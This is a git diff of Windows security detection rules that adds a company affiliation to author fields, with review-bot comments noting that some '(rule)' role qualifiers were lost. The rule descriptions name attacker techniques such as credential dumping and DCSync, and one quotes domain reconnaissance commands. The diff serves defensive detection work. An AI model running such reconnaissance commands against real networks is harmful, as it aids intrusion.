 description: Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
 references:
 - https://twitter.com/MalwareJake/status/1410421967463731200
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/07/01
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/builtin/security/win_security_admin_share_access.yml b/rules/windows/builtin/security/win_security_admin_share_access.yml
index 869c93fd1..be2c750a7 100644
--- a/rules/windows/builtin/security/win_security_admin_share_access.yml
+++ b/rules/windows/builtin/security/win_security_admin_share_access.yml
@@ -2,7 +2,7 @@ title: Access to ADMIN$ Share
 id: 098d7118-55bc-4912-a836-dc6483a8d150
 status: test
 description: Detects access to $ADMIN share
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/04
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/builtin/security/win_security_alert_ruler.yml b/rules/windows/builtin/security/win_security_alert_ruler.yml
index dd7f9f085..162633027 100644
--- a/rules/windows/builtin/security/win_security_alert_ruler.yml
+++ b/rules/windows/builtin/security/win_security_alert_ruler.yml
@@ -8,7 +8,7 @@ references:
 - https://github.com/staaldraad/go-ntlm/blob/cd032d41aa8ce5751c07cb7945400c0f5c81e2eb/ntlm/ntlmv1.go#L427
 - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776
 - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/05/31
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml b/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml
index 8c5607501..a70e7c25d 100644
--- a/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml
+++ b/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018
 references:
 - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/
-author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
+author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
 date: 2018/03/23
 modified: 2022/11/27
 tags:
diff --git a/rules/windows/builtin/security/win_security_apt_slingshot.yml b/rules/windows/builtin/security/win_security_apt_slingshot.yml
index 65a7a1f37..4c670c61c 100644
--- a/rules/windows/builtin/security/win_security_apt_slingshot.yml
+++ b/rules/windows/builtin/security/win_security_apt_slingshot.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group
 references:
 - https://securelist.com/apt-slingshot/84312/
-author: Florian Roth, Bartlomiej Czyz (@bczyz1)
+author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)
 date: 2019/03/04
 modified: 2022/11/27
 tags:
diff --git a/rules/windows/builtin/security/win_security_apt_wocao.yml b/rules/windows/builtin/security/win_security_apt_wocao.yml
index 1be1ab5ad..866be30c5 100644
--- a/rules/windows/builtin/security/win_security_apt_wocao.yml
+++ b/rules/windows/builtin/security/win_security_apt_wocao.yml
@@ -5,7 +5,7 @@ description: Detects activity mentioned in Operation Wocao report
 references:
 - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/
 - https://twitter.com/SBousseaden/status/1207671369963646976
-author: Florian Roth, frack113
+author: Florian Roth (Nextron Systems), frack113
 date: 2019/12/20
 modified: 2022/11/27
 tags:
diff --git a/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml b/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml
index 6a25f5188..51617ab1a 100644
--- a/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml
+++ b/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml
@@ -9,7 +9,7 @@ references:
 - https://www.sans.org/webcasts/119395
 - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/
 - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
-author: Florian Roth, Wojciech Lesicki
+author: Florian Roth (Nextron Systems), Wojciech Lesicki
 date: 2021/05/26
 modified: 2022/11/27
 tags:
diff --git a/rules/windows/builtin/security/win_security_dcsync.yml b/rules/windows/builtin/security/win_security_dcsync.yml
index 1663c2606..49e2ec4a5 100644
--- a/rules/windows/builtin/security/win_security_dcsync.yml
+++ b/rules/windows/builtin/security/win_security_dcsync.yml
@@ -7,7 +7,7 @@ references:
 - https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2
 - https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r
 - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662
-author: Benjamin Delpy, Florian Roth, Scott Dermott, Sorina Ionescu
+author: Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu
 date: 2018/06/03
 modified: 2022/04/26
 tags:
diff --git a/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml b/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml
index e627c712e..69fad4a49 100644
--- a/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml
+++ b/rules/windows/builtin/security/win_security_diagtrack_eop_default_login_username.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the default "UserName" used by the DiagTrackEoP POC
 references:
 - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/03
 tags:
 - attack.privilege_escalation
diff --git a/rules/windows/builtin/security/win_security_hidden_user_creation.yml b/rules/windows/builtin/security/win_security_hidden_user_creation.yml
index d232a6fdc..588bc4cc8 100644
--- a/rules/windows/builtin/security/win_security_hidden_user_creation.yml
+++ b/rules/windows/builtin/security/win_security_hidden_user_creation.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the creation of a local hidden user account which should not happen for event ID 4720.
 references:
 - https://twitter.com/SBousseaden/status/1387743867663958021
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/05/03
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/builtin/security/win_security_mal_creddumper.yml b/rules/windows/builtin/security/win_security_mal_creddumper.yml
index f8146e092..262e53b24 100644
--- a/rules/windows/builtin/security/win_security_mal_creddumper.yml
+++ b/rules/windows/builtin/security/win_security_mal_creddumper.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects well-known credential dumping tools execution via service execution events
 references:
 - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
-author: Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
+author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
 date: 2017/03/05
 modified: 2022/11/29
 tags:
diff --git a/rules/windows/builtin/security/win_security_mal_service_installs.yml b/rules/windows/builtin/security/win_security_mal_service_installs.yml
index 603aa9928..4b24319fd 100644
--- a/rules/windows/builtin/security/win_security_mal_service_installs.yml
+++ b/rules/windows/builtin/security/win_security_mal_service_installs.yml
@@ -9,7 +9,7 @@ references:
 - https://awakesecurity.com/blog/threat-hunting-for-paexec/
 - https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html
 - https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf
-author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update)
+author: Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)
 date: 2017/03/27
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml b/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml
index b69e5102e..47567df26 100644
--- a/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml
+++ b/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects NetNTLM downgrade attack
 references:
 - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks
-author: Florian Roth, wagga
+author: Florian Roth (Nextron Systems), wagga
 date: 2018/03/20
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml b/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml
index 50bf5ce48..0b018e073 100644
--- a/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml
+++ b/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml
@@ -2,7 +2,7 @@ title: Rare Schtasks Creations
 id: b0d77106-7bb0-41fe-bd94-d1752164d066
 status: test
 description: Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/23
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml b/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml
index edd5503e0..9bb8fc0c5 100644
--- a/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml
+++ b/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml
@@ -5,7 +5,7 @@ description: Detects the use of a scanner by zerosum0x0 that discovers targets v
 references:
 - https://twitter.com/AdamTheAnalyst/status/1134394070045003776
 - https://github.com/zerosum0x0/CVE-2019-0708
-author: Florian Roth (rule), Adam Bradbury (idea)
+author: Florian Roth (Nextron Systems), Adam Bradbury (idea)
 date: 2019/06/02
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml b/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml
index 8375702b7..0c6bbc659 100644
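Review bot: In the win_security_rdp_bluekeep_poc_scanner.yml hunk the new author line replaces the role qualifier "(rule)" with the affiliation "(Nextron Systems)", so the field no longer says who wrote the rule versus who contributed the idea, while "Adam Bradbury (idea)" keeps its role. Elsewhere in this commit the affiliation is appended to a bare name, so this hunk is the only place where existing attribution text is removed rather than extended. Keeping both pieces of information preserves the provenance the field is meant to carry: `author: Florian Roth (Nextron Systems, rule), Adam Bradbury (idea)`.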
--- a/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml
+++ b/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
 references:
 - https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/12/22
 modified: 2022/12/25
 logsource:
diff --git a/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml b/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml
index 249e1f352..f7cd39645 100644
--- a/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml
+++ b/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml
@@ -8,7 +8,7 @@ description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevt
 references:
 - https://twitter.com/deviouspolack/status/832535435960209408
 - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/01/10
 modified: 2022/02/24
 tags:
diff --git a/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml b/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml
index 1c1a2c3fc..19a2088f4 100644
--- a/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml
+++ b/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml
@@ -5,7 +5,7 @@ description: This method uses uncommon error codes on failed logons to determine
 references:
 - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625
 - https://twitter.com/SBousseaden/status/1101431884540710913
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/02/19
 modified: 2022/06/29
 tags:
diff --git a/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml b/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml
index e7a506127..460b1f4e0 100644
--- a/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml
+++ b/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml
@@ -2,7 +2,7 @@ title: Failed Logins with Different Accounts from Single Source System
 id: e98374a6-e2d9-4076-9b5c-11bdb2569995
 status: test
 description: Detects suspicious failed logins with different user accounts from a single source system
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/01/10
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml b/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml
index 88f037f25..ddbf4da6c 100644
--- a/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml
+++ b/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml
@@ -5,7 +5,7 @@ related:
 type: derived
 status: test
 description: Detects suspicious failed logins with different user accounts from a single source system
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/01/10
 modified: 2022/11/26
 tags:
diff --git a/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml b/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml
index b44d161f1..0164af360 100644
--- a/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml
+++ b/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml
@@ -2,7 +2,7 @@ title: Kerberos Manipulation
 id: f7644214-0eb0-4ace-9455-331ec4c09253
 status: test
 description: This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/02/10
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml b/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml
index 293620525..b09d42450 100644
--- a/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml
+++ b/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects logon events that specify new credentials
 references:
 - https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2022/04/06
 logsource:
 product: windows
diff --git a/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml b/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml
index 85e8f6951..76d15c0f7 100644
--- a/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml
+++ b/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects activity as "net user administrator /domain" and "net group domain admins /domain"
 references:
 - https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html
-author: Florian Roth (rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community
+author: Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community
 date: 2017/03/07
 modified: 2022/08/22
 tags:
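Review bot: In the win_security_susp_net_recon_activity.yml hunk the new author line drops the "(rule)" role qualifier from Florian Roth's entry while "(method)" and "(improvements)" survive on the other contributors, so the field now mixes one affiliation with two roles and no longer says who authored the rule itself. Since the rest of the commit only appends the affiliation to bare names, this looks like an unintended side effect of a search-and-replace on "Florian Roth". Keeping both pieces avoids the loss of attribution: `author: Florian Roth (Nextron Systems, rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community`.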
diff --git a/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml b/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml
index de2b5d595..62049c326 100644
--- a/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml
+++ b/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
 references:
 - https://twitter.com/sbousseaden/status/1523383197513379841
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/05/09
 logsource:
 product: windows
diff --git a/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml b/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml
index fd954acb5..6c494561c 100644
--- a/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml
+++ b/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.
 references:
 - https://twitter.com/sbousseaden/status/1523383197513379841
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/05/09
 logsource:
 product: windows
diff --git a/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml b/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml
index 46ebae3f5..ca222a38f 100644
--- a/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml
+++ b/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
 references:
 - https://twitter.com/sbousseaden/status/1523383197513379841
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/05/09
 logsource:
 product: windows
diff --git a/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml b/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml
index 13465e7a2..c8f83d5f4 100644
--- a/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml
+++ b/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml
@@ -6,7 +6,7 @@ references:
 - https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html
 - https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/
 - https://twitter.com/SBousseaden/status/1581300963650187264?
-author: Nasreddine Bencherchali (rule), Elastic (idea)
+author: Nasreddine Bencherchali (Nextron Systems), Elastic (idea)
 date: 2022/10/17
 tags:
 - attack.credential_access
diff --git a/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml b/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml
index 263076832..859642906 100644
--- a/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml
+++ b/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml
@@ -5,7 +5,7 @@ description: Detects service ticket requests using RC4 encryption type
 references:
 - https://adsecurity.org/?p=3458
 - https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/02/06
 modified: 2022/06/19
 tags:
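Review bot: In the win_security_susp_possible_shadow_credentials_added.yml hunk the new author line replaces "(rule)" with "(Nextron Systems)", so the entry no longer records that Nasreddine Bencherchali wrote the rule while Elastic supplied the idea, even though "Elastic (idea)" keeps its qualifier. The same pattern appears in the other "(rule)" entries touched by this commit, which suggests the replacement did not account for existing parenthesised roles. Preserving both is a one-token change: `author: Nasreddine Bencherchali (Nextron Systems, rule), Elastic (idea)`.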
diff --git a/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml b/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml
index 4da7fb242..3ea3e2913 100644
--- a/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml
+++ b/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.
 references:
 - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/05
 modified: 2022/12/07
 tags:
diff --git a/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml b/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml
index b8f9859ca..3b99f9f4f 100644
--- a/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml
+++ b/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml
@@ -12,7 +12,7 @@ description: Detects when adversaries stop services or processes by deleting or
 references:
 - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699
 - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/05
 modified: 2022/12/09
 tags:
diff --git a/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml b/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml
index 6c487bf1b..157385fdd 100644
--- a/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml
+++ b/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects update to a scheduled task event that contain suspicious keywords.
 references:
 - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/05
 tags:
 - attack.execution
diff --git a/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml b/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml
index e6a91556e..12c588b5e 100644
--- a/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml
+++ b/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml
@@ -2,7 +2,7 @@ title: User Added to Local Administrators
 id: c265cf08-3f99-46c1-8d59-328247057d57
 status: stable
 description: This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/14
 modified: 2021/01/17
 tags:
diff --git a/rules/windows/builtin/security/win_security_wmi_persistence.yml b/rules/windows/builtin/security/win_security_wmi_persistence.yml
index 2851c8613..6b22aa511 100644
--- a/rules/windows/builtin/security/win_security_wmi_persistence.yml
+++ b/rules/windows/builtin/security/win_security_wmi_persistence.yml
@@ -8,7 +8,7 @@ description: Detects suspicious WMI event filter and command line event consumer
 references:
 - https://twitter.com/mattifestation/status/899646620148539397
 - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
-author: Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
+author: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
 date: 2017/08/22
 modified: 2022/11/29
 tags:
diff --git a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml
index 5e2c4ddce..2f74d8d06 100644
--- a/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml
+++ b/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations
 references:
 - https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/03
 modified: 2022/09/28
 tags:
diff --git a/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml b/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml
index 6bcec6e14..309586706 100644
--- a/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml
+++ b/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious application installed by looking at the added shortcut to the app resolver cache
 references:
 - https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/14
 tags:
 - attack.execution
diff --git a/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml b/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml
index f8ff9adc9..7405115fe 100644
--- a/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml
+++ b/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml
@@ -6,7 +6,7 @@ references:
 - https://twitter.com/KevTheHermit/status/1410203844064301056
 - https://github.com/hhlxf/PrintNightmare
 - https://github.com/afwu/PrintNightmare
-author: Florian Roth, KevTheHermit, fuzzyf10w
+author: Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w
 date: 2021/06/30
 modified: 2023/01/02
 tags:
diff --git a/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml b/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml
index 20c565b96..ca081753a 100755
--- a/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml
+++ b/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml
@@ -4,7 +4,7 @@ status: test
 description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
 references:
 - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/31
 modified: 2021/11/30
 tags:
diff --git a/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml b/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml
index cfc406ed3..d20c11f0e 100644
--- a/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml
+++ b/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018
 references:
 - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/
-author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
+author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
 date: 2018/03/23
 modified: 2022/11/27
 tags:
diff --git a/rules/windows/builtin/system/win_system_apt_stonedrill.yml b/rules/windows/builtin/system/win_system_apt_stonedrill.yml
index 248b67604..32d23378b 100755
--- a/rules/windows/builtin/system/win_system_apt_stonedrill.yml
+++ b/rules/windows/builtin/system/win_system_apt_stonedrill.yml
@@ -4,7 +4,7 @@ status: test
 description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
 references:
 - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/07
 modified: 2021/11/30
 tags:
diff --git a/rules/windows/builtin/system/win_system_apt_turla_service_png.yml b/rules/windows/builtin/system/win_system_apt_turla_service_png.yml
index 255a88fd9..4cce1cdd7 100644
--- a/rules/windows/builtin/system/win_system_apt_turla_service_png.yml
+++ b/rules/windows/builtin/system/win_system_apt_turla_service_png.yml
@@ -4,7 +4,7 @@ status: test
 description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
 references:
 - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/11/23
 modified: 2021/11/30
 tags:
diff --git a/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml b/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml
index 7c2dcf12c..6caf33107 100644
--- a/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml
+++ b/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml
@@ -6,7 +6,7 @@ references:
 - https://www.sans.org/webcasts/119395
 - https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/
 - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
-author: Florian Roth, Wojciech Lesicki
+author: Florian Roth (Nextron Systems), Wojciech Lesicki
 date: 2021/05/26
 modified: 2022/11/27
 tags:
diff --git a/rules/windows/builtin/system/win_system_eventlog_cleared.yml b/rules/windows/builtin/system/win_system_eventlog_cleared.yml
index 8aadb63f4..a1b492229 100644
--- a/rules/windows/builtin/system/win_system_eventlog_cleared.yml
+++ b/rules/windows/builtin/system/win_system_eventlog_cleared.yml
@@ -12,7 +12,7 @@ description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevt
 references:
 - https://twitter.com/deviouspolack/status/832535435960209408
 - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/01/10
 modified: 2023/01/18
 tags:
diff --git a/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml b/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml
index f85fed634..12739f73d 100644
--- a/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml
